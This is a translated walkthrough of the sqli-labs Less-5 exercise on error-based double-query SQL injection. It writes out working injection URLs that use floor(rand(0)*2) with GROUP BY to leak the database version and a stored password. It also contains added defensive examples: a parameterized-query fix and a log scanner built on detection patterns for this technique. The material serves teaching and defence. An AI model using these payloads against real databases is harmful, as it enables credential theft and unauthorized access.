sqli-labs:Less-5

Less-5 is a character-type (string) parameter, single-quote delimiter, error-based injection, also called double-query injection.

First, enter http://localhost/Less-5/?id=1' and the page returns an error:

Input http://localhost/Less-5/?id=1' and 1=1 %23 and http://localhost/Less-5/?id=1' and 1=2 %23; both return the normal page:

Here it is almost certain that this is a character-type injection, but unlike Less-1 the page does not echo the query result; it only shows an error message when the query fails. So this is character-type, error-based injection, a new kind of situation.

We must first look at what is being echoed back to us. In the source code we see the error-echo function mysql_error().

mysql_error() returns the text of the error message from the most recent MySQL operation. The query can be estimated to be a character-type query:
$sql = "SELECT * FROM users WHERE id='$id' LIMIT 0,1";
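Why this query shape is the whole problem, shown as an added example (not the lab's own code): the id value is pasted into the SQL text, so a stray quote changes the statement and the driver's error text comes back to the caller, which the lab then prints via mysql_error(). The example uses Python with an in-memory SQLite table as a stand-in for the lab's users table (constructed data, not the lab's); the hardened version binds the id as a parameter so it can never become SQL. The function names and the error_text return value are this example's own.

```python
import sqlite3


def make_db():
    """Constructed stand-in for the sqli-labs 'users' table (not the lab's real rows)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER, username TEXT, password TEXT)")
    conn.executemany(
        "INSERT INTO users VALUES (?, ?, ?)",
        [(1, "alice", "example-pw-1"), (2, "bob", "example-pw-2")],
    )
    return conn


def query_concat(conn, user_id):
    """Mirrors the lab's pattern: $sql = "SELECT * FROM users WHERE id='$id' LIMIT 0,1".

    Returns (rows, error_text). error_text is what a page that echoes
    mysql_error() would hand straight to the client.
    """
    sql = "SELECT * FROM users WHERE id='%s' LIMIT 0,1" % user_id
    try:
        return conn.execute(sql).fetchall(), None
    except sqlite3.Error as exc:
        # In the lab this string is printed to the page; a hardened app logs it
        # server-side and returns a generic message instead.
        return [], str(exc)


def query_param(conn, user_id):
    """Hardened form: the id travels as a bound parameter, never as SQL text.

    A value such as "1'" is compared as data, so it matches nothing and raises nothing.
    """
    rows = conn.execute(
        "SELECT * FROM users WHERE id=? LIMIT 0,1", (user_id,)
    ).fetchall()
    return rows, None


if __name__ == "__main__":
    db = make_db()
    print(query_concat(db, "1"))    # normal lookup works
    print(query_concat(db, "1'"))   # syntax error text leaks to the caller
    print(query_param(db, "1'"))    # no rows, no error
```

The first thing a reviewer checks on code like the lab's is whether any database error text can reach the HTTP response; the second is whether every user-controlled value is bound rather than concatenated.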

Next we introduce error-based injection. We need to learn about the floor() and rand() functions:
floor() returns the largest integer less than or equal to its argument; it can be understood as rounding down, keeping only the integer part.
rand() can be used to generate 0 or 1 (as floor(rand()*2)), but rand(0) and rand() are essentially different. rand(0) passes 0 as the seed, so rand() generates its numbers according to that seed. rand() produces completely random numbers, while rand(0) produces a regular, repeatable sequence. We can try this in the database. First test rand().

Log on to our sqli-labs database on the command line and look at how these two functions behave:
select floor(rand()*2) from mysql.user;

select floor(rand(0)*2) from mysql.user;

Execute the two statements above repeatedly and you will find that rand(0) is actually pseudo-random: the results are the same every time.

Next we execute the statement:
select count(*), concat((floor(rand()*2)), ';', (select version())) name from mysql.user group by name;

This statement returns correctly.

select count(*), concat((floor(rand(0)*2)), ';', (select version())) name from mysql.user group by name;

This statement, however, raises an error. The reason is:
a duplicate entry for group_key. When we query with group by, the database generates a virtual table in which the field after group by is the primary key, so in this table the primary key is name. So we basically understand the cause of the error: the primary key of the virtual table is repeated. According to MySQL's official statement, the group by expression is evaluated twice. The first time, the value of the group by field is computed and compared against the virtual table. The second time, if that value does not exist in the virtual table, it must be inserted, and at insertion the expression is computed again. Because rand() has a certain randomness, the second result may differ from the first, and that second result may already exist in the virtual table. This inevitably leads to the insertion of a duplicate primary key, and an error is thrown.
At the same time we see that the error message carries sensitive information: the output of select version(), the database version, is displayed.

We put this statement into the page:
http://localhost/Less-5/?id=1' union select count(*),1,concat((floor(rand(0)*2)),';',(select version())) name from mysql.user group by name;%23

Here we see the database version number dumped out.

We can also dump passwords from the users table:
http://localhost/Less-5/?id=1' union select count(*),1,concat((floor(rand(0)*2)),';',(select password from users limit 1,1)) name from mysql.user group by name;%23
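The requests above leave a distinctive trace in the web server's access log, which is the defender's side of this lesson. The following is an added example (not from the write-up or from sqli-labs) that scans constructed access-log lines for the signatures of the technique shown here: the floor(rand(0)*2) expression together with GROUP BY, and UNION SELECT. The log lines, the hostnames and the function names are constructed for the example; the encoded payload is the page's own, URL-encoded as a browser would send it.

```python
import re
from urllib.parse import unquote_plus

# Signatures of the technique on this page. Matched case-insensitively after URL
# decoding; whitespace and the optional rand() seed are tolerated.
FLOOR_RAND = re.compile(r"floor\s*\(\s*rand\s*\(\s*\d*\s*\)\s*\*\s*2\s*\)", re.I)
GROUP_BY = re.compile(r"\bgroup\s+by\b", re.I)
UNION_SEL = re.compile(r"\bunion\s+(?:all\s+)?select\b", re.I)

# Pulls the request target out of a combined-log-format line.
REQ_LINE = re.compile(r'"(?:GET|POST) (\S+) HTTP/')


def classify_request(path):
    """Return the list of reasons a request target looks like SQLi, or [] if none."""
    decoded = unquote_plus(path)
    reasons = []
    if FLOOR_RAND.search(decoded) and GROUP_BY.search(decoded):
        reasons.append("error-based: floor(rand()*2) with GROUP BY")
    if UNION_SEL.search(decoded):
        reasons.append("union-based: UNION SELECT")
    return reasons


def scan_log(lines):
    """Return [(request_target, reasons)] for every log line that matches a signature."""
    hits = []
    for line in lines:
        match = REQ_LINE.search(line)
        if not match:
            continue
        reasons = classify_request(match.group(1))
        if reasons:
            hits.append((match.group(1), reasons))
    return hits


# Constructed sample access-log lines (combined log format). Line 3 carries the
# version-dumping payload from the write-up, URL-encoded.
SAMPLE_LOG = [
    '127.0.0.1 - - [10/Mar/2020:10:00:01 +0800] "GET /Less-5/?id=1 HTTP/1.1" 200 742',
    '127.0.0.1 - - [10/Mar/2020:10:00:05 +0800] "GET /Less-5/?id=1%27 HTTP/1.1" 200 810',
    '127.0.0.1 - - [10/Mar/2020:10:00:09 +0800] "GET /Less-5/?id=1%27%20union%20select%20'
    'count(*),1,concat((floor(rand(0)*2)),%27;%27,(select%20version()))%20name%20from%20'
    'mysql.user%20group%20by%20name;%23 HTTP/1.1" 200 905',
    '127.0.0.1 - - [10/Mar/2020:10:00:12 +0800] "GET /index.php?page=about HTTP/1.1" 200 1203',
]

if __name__ == "__main__":
    for target, reasons in scan_log(SAMPLE_LOG):
        print(target, "->", "; ".join(reasons))
```

Note that the bare single-quote probe on the second line is deliberately not flagged: a lone quote in a query string is far too common in legitimate traffic to alert on, so the rule keys on the structure of the error-based query itself. A 200 status on the payload line is also telling; the page "succeeds" because the lab prints mysql_error() instead of failing closed.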


Source: www.cnblogs.com/tangjf10/p/12600173.html